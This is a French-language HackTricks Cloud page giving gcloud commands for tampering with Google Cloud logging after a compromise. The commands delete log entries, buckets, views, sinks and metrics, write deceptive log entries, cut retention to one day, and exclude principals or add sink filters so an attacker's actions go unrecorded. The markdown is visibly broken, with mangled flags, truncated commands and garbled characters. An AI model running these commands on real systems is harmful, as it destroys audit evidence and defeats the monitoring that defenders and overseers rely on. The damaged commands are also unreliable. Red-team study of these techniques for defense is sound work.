HackTricks CloudGCP - Post-exploitation des logs
Tip
Apprenez & pratiquez AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.
Informations de base
Pour plus dâinformations, voir :
Pour dâautres façons de perturber la surveillance, voir :
GCP - Monitoring Post Exploitation
Journalisation par défaut
Par dĂ©faut vous ne serez pas repĂ©rĂ© simplement pour avoir effectuĂ© des actions en lecture. Pour plus dâinformations, voir la section Logging Enum.
Ajouter un principal exclu
Dans [https://console.cloud.google.com/iam-admin/audit/allservices] et [https://console.cloud.google.com/iam-admin/audit] il est possible dâajouter des principals pour ne pas gĂ©nĂ©rer de logs. Un attaquant pourrait abuser de cela pour Ă©viter dâĂȘtre dĂ©tectĂ©.
Lire les logs - logging.logEntries.list
Lire les entrées de logs
```bash # Read logs gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=jsonEverything from a timestamp
gcloud logging read âtimestamp >= "2023-01-01T00:00:00Z"â âlimit=10 âformat=json
Use these options to indicate a different bucket or view to use: âbucket=_Required âview=_Default
</details>
### `logging.logs.delete`
<details>
<summary>Supprimer des entrées de logs</summary>
```bash
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>
Ăcrire des logs - logging.logEntries.create
Ăcrire une entrĂ©e de log
```bash # Write a log entry to try to disrupt some system gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR ```logging.buckets.update
Mettre à jour la rétention du bucket de logs
```bash # Set retention period to 1 day (_Required has a fixed one of 400days)gcloud logging buckets update bucketlog âlocation=
</details>
### `logging.buckets.delete`
<details>
<summary>Supprimer un bucket de logs</summary>
```bash
# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>
logging.links.delete
Supprimer le log link
```bash # Delete link gcloud logging links deletelogging.views.delete
Supprimer la vue de logging
```bash # Delete a logging view to remove access to anyone using it gcloud logging views deletelogging.views.update
Mettre à jour la logging view pour masquer les données
```bash # Update a logging view to hide data gcloud logging views updatelogging.logMetrics.update
Mettre à jour les métriques basées sur les logs
```bash # Update log based metrics - logging.logMetrics.update gcloud logging metrics updatelogging.logMetrics.delete
Supprimer les métriques basées sur les logs
```bash # Delete log based metrics - logging.logMetrics.delete gcloud logging metrics deletelogging.sinks.delete
Supprimer log sink
```bash # Delete sink - logging.sinks.delete gcloud logging sinks deletelogging.sinks.update
Mettre Ă jour/perturber le log sink
```bash # Disable sink - logging.sinks.update gcloud logging sinks updateCreatea filter to exclude attackers logs - logging.sinks.update
gcloud logging sinks update SINK_NAME âadd-exclusion=âname=exclude-info-logs,filter=severity<INFOâ
Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update
Change the service account to one withuot permissions to write in the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME âcustom-writer-identity=attacker-service-account-email âproject=PROJECT_ID
Remove explusions to try to overload with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME âclear-exclusions
If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloud logging sinks update SINK_NAME âuse-partitioned-tables gcloud logging sinks update SINK_NAME âno-use-partitioned-tables
</details>
> [!TIP]
> Apprenez & pratiquez AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Apprenez & pratiquez GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Apprenez & pratiquez Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Soutenez HackTricks</summary>
>
> - Consultez les [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Rejoignez le** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) ou le [**telegram group**](https://t.me/peass) ou **suivez-nous** sur **Twitter** đŠ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Partagez des hacking tricks en soumettant des PRs aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>